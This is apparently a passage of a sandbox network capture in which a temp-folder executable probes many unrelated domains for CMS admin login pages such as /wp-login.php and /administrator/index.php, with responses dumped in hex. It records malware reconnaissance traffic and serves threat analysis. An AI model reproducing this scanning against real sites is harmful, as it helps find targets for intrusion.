Nov 30, 2023 11:22:39.750808001 CET	1340	IN	Data Raw: 47 33 bc 94 00 d1 58 c2 45 05 b3 3e 8e a8 39 42 97 9a 47 54 e9 33 17 67 ed 4c 9e ae d3 e7 45 7a 54 02 a5 d7 80 5b d7 8e 99 23 9d 40 37 74 3d b5 9c 14 0a 99 b6 fc 63 2b 22 28 60 8e ce 21 99 e8 94 49 37 b1 98 37 f2 b1 df 9f e0 f8 11 2d 29 c1 8e b4 Data Ascii: G3XE>9BGT3gLEzT[#@7t=c+"(`!I77-)I{q2tBHHx7zV,mt`<,{69m##'2vcZMr)v9n4%:1)(^!>`dH<p 0
Nov 30, 2023 11:22:39.750817060 CET	76	IN	Data Raw: 02 55 47 4e b6 fe 0f af 6d 97 c0 23 41 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: UGNm#A0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	56446	157.7.44.171	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.616800070 CET	236	OUT	GET /administrator/index.php HTTP/1.1 Host: gmaso.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.886179924 CET	444	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 221 Connection: keep-alive Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /administrator/index.php was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	58631	15.197.172.60	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.654885054 CET	220	OUT	GET /wp-login.php HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.754340887 CET	927	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/wp-login.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_QYatw3rsOglfJWMQnSF3CU1XH5Lm2x8n+awW5DPf3bCA/NGZjeYgpgKS2PWdKWhSThFPTUjsmyyOyNzYiMZ+Nw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:39.959721088 CET	927	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/wp-login.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_QYatw3rsOglfJWMQnSF3CU1XH5Lm2x8n+awW5DPf3bCA/NGZjeYgpgKS2PWdKWhSThFPTUjsmyyOyNzYiMZ+Nw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:41.088783026 CET	370	OUT	GET /wp-admin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://1.tv/wp-login.php
Nov 30, 2023 11:22:41.189574957 CET	924	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/wp-admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_X27dujZtkyg80dvwN8eFwFrIlCp+2LlwHyDfLvForZR7VPaqetR7XsvvSzbMsx8RXUMRXjm4BK9A+MQb+JumPg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:41.395761013 CET	924	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/wp-admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_X27dujZtkyg80dvwN8eFwFrIlCp+2LlwHyDfLvForZR7VPaqetR7XsvvSzbMsx8RXUMRXjm4BK9A+MQb+JumPg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	58643	216.37.42.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.655874014 CET	220	OUT	GET /admin/ HTTP/1.1 Host: noweco.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.303919077 CET	485	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:40 GMT Server: Apache Location: https://www.noweco.com/admin/ Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 6f 77 65 63 6f 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.noweco.com/admin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	58634	199.59.243.225	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.655880928 CET	218	OUT	GET /admin.php HTTP/1.1 Host: ia.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.755599976 CET	1254	IN	HTTP/1.1 200 OK date: Thu, 30 Nov 2023 10:22:39 GMT content-type: text/html; charset=utf-8 content-length: 1005 x-request-id: b198ac53-835b-42f7-9f2c-16906fd9b306 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bZaNohbTaRDZotag1+lxPZrvSD4mOuWiN55qawvqHQaTDGaVgu4B1YP6EKvHuQDeIIKvid2kdqZQxS/tUFbVJg== set-cookie: parking_session=b198ac53-835b-42f7-9f2c-16906fd9b306; expires=Thu, 30 Nov 2023 10:37:39 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 5a 61 4e 6f 68 62 54 61 52 44 5a 6f 74 61 67 31 2b 6c 78 50 5a 72 76 53 44 34 6d 4f 75 57 69 4e 35 35 71 61 77 76 71 48 51 61 54 44 47 61 56 67 75 34 42 31 59 50 36 45 4b 76 48 75 51 44 65 49 49 4b 76 69 64 32 6b 64 71 5a 51 78 53 2f 74 55 46 62 56 4a 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bZaNohbTaRDZotag1+lxPZrvSD4mOuWiN55qawvqHQaTDGaVgu4B1YP6EKvHuQDeIIKvid2kdqZQxS/tUFbVJg==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link
Nov 30, 2023 11:22:39.755609035 CET	529	IN	Data Raw: 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 Data Ascii: rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjE5OGFjNTMtODM1Yi00MmY3LTlmMmMtMTY5MDZmZDliMzA2IiwicGFnZV90aW1lIjoxNzAxMzM5NzU5LCJwYWdlX3
Nov 30, 2023 11:22:39.768881083 CET	529	IN	Data Raw: 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 Data Ascii: rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjE5OGFjNTMtODM1Yi00MmY3LTlmMmMtMTY5MDZmZDliMzA2IiwicGFnZV90aW1lIjoxNzAxMzM5NzU5LCJwYWdlX3

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	58640	54.209.32.212	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.655920029 CET	236	OUT	GET /administrator/index.php HTTP/1.1 Host: bjail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.754836082 CET	202	IN	HTTP/1.1 302 Found content-length: 0 date: Thu, 30 Nov 2023 10:22:39 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=bjail.com

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	58642	104.247.82.52	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.656316996 CET	232	OUT	GET /administrator/index.php HTTP/1.1 Host: cm.cz Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.808351994 CET	132	IN	Data Raw: 72 82 0f 03 df 1f b8 ac 6c f9 a3 8a 69 87 cc 0b 59 c5 f6 47 a6 e3 85 15 cb ec 97 6f c3 97 66 6f 6c e8 b9 83 17 15 31 f8 80 b3 21 8c e6 2e d3 46 cc 76 4c 23 87 0e 06 96 1d ac 95 cd 10 0b fd 1a 46 66 50 d5 be ad 3d e9 99 d6 dd 20 0d 0a Data Ascii: rliYGofol1!.FvL#FfP=
Nov 30, 2023 11:22:39.808368921 CET	1340	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_GpzOBrO3i3Z+3WvoGYP8y9bH6x4L1hanEKKuYzcyj9R58f7J16AwbV+r6/B0EsGF7+thaiEtC6RbYfCc7UKQ3Q== Accept-CH: viewport-width Accept-CH: dpr Accept-CH: device-memory Accept-CH: rtt Accept-CH: downlink Accept-CH: ect Accept-CH: ua Accept-CH: ua-full-version Accept-CH: ua-platform Accept-CH: ua-platform-version Accept-CH: ua-arch Accept-CH: ua-model Accept-CH: ua-mobile Accept-CH-Lifetime: 30 X-Domain: cm.cz X-Subdomain: Content-Encoding: gzip Data Raw: 32 33 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5b ed 7a da ba b2 fe dd 5c 85 4b 9f 1d c8 29 5f 86 90 cf 3a 3d a4 24 4d d2 42 9a 94 b4 4d fa f4 f4 31 b6 00 27 c6 66 db 26 40 ba 7b 01 e7 ba ce 8d 9d 77 24 d9 96 81 b4 ab 6b 77 ad 5f 9b 36 09 96 46 9a d1 7c 69 66 24 bf 78 da 3a 7f d5 bd 7e 77 a4 0d a3 91 7b b0 f6 82 fe 68 b6 19 99 25 d3 ee b9 be 75 77 c7 e6 46 ae 7d 3c 9d b6 2e ae cf de f8 37 a7 c3 7b ab d3 bc 38 3a 3c bc 68 b6 de 4f 9b d3 f7 cd b3 c3 e6 db 7f 4e 5a c7 47 dd 4f 97 5e f5 24 a8 36 fa 57 ef b6 8f ce ba db db b3 6b ef dd e8 b2 37 6e cf 37 ef ef 76 de 5c 3b 27 de 5d 67 cc 6c ef f6 bc d9 39 b3 cc 4f ad 4f d6 9b 8b b3 4e d5 fb f4 e6 e6 ec ed 76 d7 72 ce 5a 3b 4d ff e4 d3 1b bd b1 f3 aa 39 3d 6a 36 2f 0c e3 eb eb f1 c3 f9 61 70 5e 77 ea 37 cf eb 1f ef fd d7 d7 ef 76 e6 bb bd 93 ad d9 e6 5b 7d 68 7a 47 6f de 4c ae 1f ac f9 ed ee 65 63 a7 bf 7d a6 6f 35 a7 bd 0f cf 83 ad ca 61 f5 28 7c 7d bc fd 3c 1a 9a ce 51 f4 6a eb b2 77 dd 7f 65 6d 5f bd b9 a8 63 e2 9c 36 1b b9 5e 68 e4 86 51 34 de ab 54 a6 d3 69 79 5a 2f fb c1 a0 a2 ef ee ee 56 66 c4 0f 0e b4 e7 9a de c0 c8 31 2f a7 25 df 88 5f cc b4 0f d6 34 7c 5e 8c 58 64 82 8d d1 b8 c4 fe 39 71 ee 8d dc 2b df 8b 98 17 95 ba f3 31 cb 69 96 78 32 72 11 9b 45 15 9a 77 5f b3 86 66 10 b2 c8 98 44 fd d2 4e ae a2 4e e4 99 23 66 e4 ee 1d 36 1d fb 41 a4 0c 9f 3a 76 34 34 6c 76 ef 58 ac c4 1f 8a 9a e3 39 91 63 ba a5 d0 32 5d 66 e8 45 2d 1c 06 8e 77 57 8a fc 52 df 89 0c cf 4f e6 8e 9c c8 65 07 d6 a8 6c 3d bc a8 88 07 41 7d 68 05 ce 38 d2 c2 c0 32 Data Ascii: 23d[z\K)_:=$MBM1'f&@{w$kw_6F\|if$x:~w{h%uwF}<.7{8:<hONZGO^$6Wk7n7v\;']gl9OONvrZ;M9=j6/ap^w7v[}hzGoLec}o5a(\|}<Qjwem_c6^hQ4TiyZ/Vf1/%_4\|^Xd9q+1ix2rEw_fDNN#f6A:v44lvX9c2]fE-wWROel=A}h82
Nov 30, 2023 11:22:39.808378935 CET	1340	IN	Data Raw: 31 34 33 62 0d 0a f0 27 9e bd a7 4d 02 b7 90 af 54 ec fa ce 38 0c 3c 47 df ee dd cf 26 65 cb f5 27 76 3f 00 d7 ca 1e 8b 2a d1 90 8d 58 58 e1 d3 84 15 3e 4f 79 e0 f4 f3 1b 9a e7 97 02 36 66 66 a4 59 e0 36 0b f6 d7 9e 70 b6 ec 69 7a 7d 3c c3 d3 90 Data Ascii: 143b'MT8<G&e'v?*XX>Oy6ffY6piz}<9ap=pu<Vj}M%RMD%'OdD#m;H1l!s]\zC{fW{h7gd3-NX =W#38^Uj#VMk;]ESw
Nov 30, 2023 11:22:39.808438063 CET	1340	IN	Data Raw: 91 48 54 06 bc 18 ea 71 52 8c 6f 5c 62 0a 31 09 47 14 a2 e2 6d 5b 99 24 03 46 a8 22 8b 92 e3 64 4d 49 7f b6 49 81 50 be 26 c0 0a 4e b1 61 2e 60 ac 55 6b 75 ed 95 3f 9e 73 03 2b 6b 5a d3 75 b5 4b 4a b5 42 ed 92 21 74 be 67 76 19 ce 20 a8 1c f0 5f Data Ascii: HTqRo\b1Gm[$F"dMIIP&Na.`Uku?s+kZuKJB!tgv _k\o{S{{\Xi38pMk^EsizN-jQQW5(&\.;bg(IG+ZMIXH3JG{CsH}5_\(vD(zLQtC9D{o
Nov 30, 2023 11:22:39.808448076 CET	1340	IN	Data Raw: 28 34 e2 91 e4 5a 8f 79 61 94 46 f0 b4 29 ee f2 41 c7 08 9b 75 17 b5 b4 10 bd a9 53 ce 23 f1 a1 d6 b7 cc 1b 44 43 74 6d 56 85 f7 cf 0b 6d cb 02 5b 14 fc 45 e4 bd 7e 42 17 87 e1 41 7f 4c 82 99 c6 09 b1 f3 6d da 61 dc cb 1d f4 e2 e6 de db a6 7f 31 Data Ascii: (4ZyaF)AuS#DCtmVm[E~BALma1HsdtCT@#xEwY.vVwa2> '`qPtHG>TQA'<\|/&@_ms5*S;oC]s@T!o\|~A\|SFp0
Nov 30, 2023 11:22:39.808456898 CET	1340	IN	Data Raw: a3 e7 0b 50 53 0f ff 2e 47 06 2c 9a 04 7c 80 8e 6b 8a 68 4c 68 43 2d e8 53 fb 2d 5d 3e 4f 6a 1f 84 01 97 db 4f d0 86 a9 bc 89 eb 8a 98 29 5b 5f 52 20 b0 25 63 0e 82 a7 a3 4c 64 65 05 19 dd 7f 4f 6a 1b f1 ba 49 ec d9 79 a8 25 3b 57 93 df c1 fd 74 Data Ascii: PS.G,\|khLhC-S-]>OjO)[_R %cLdeOjIy%;WtQCt}Sdz~f?8x+CBE,u=/C.Sx:RQ\3sxAP'h K@2nHW<kk.NYN,[0'yH.26
Nov 30, 2023 11:22:39.808473110 CET	102	IN	Data Raw: 44 fc 88 0f a1 b2 61 a9 bc c5 0d e6 f0 3b 91 f1 d5 db 0c 15 78 ff d0 9e d3 6b 09 74 46 72 b0 f6 ff cd 64 00 e0 2d 41 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: Da;xktFrd-A0

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	58644	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.656404972 CET	235	OUT	GET /administrator/index.php HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.755790949 CET	894	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://6ail.com/administrator/index.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_S7vf13zvxVXYwqLdj0XYmQF4RfwuciRH1uF2NyqMQTmEh48D0rQzXr96HDiVPT5CGRNj0NXUjRt1dntJtJBfWw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.132;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
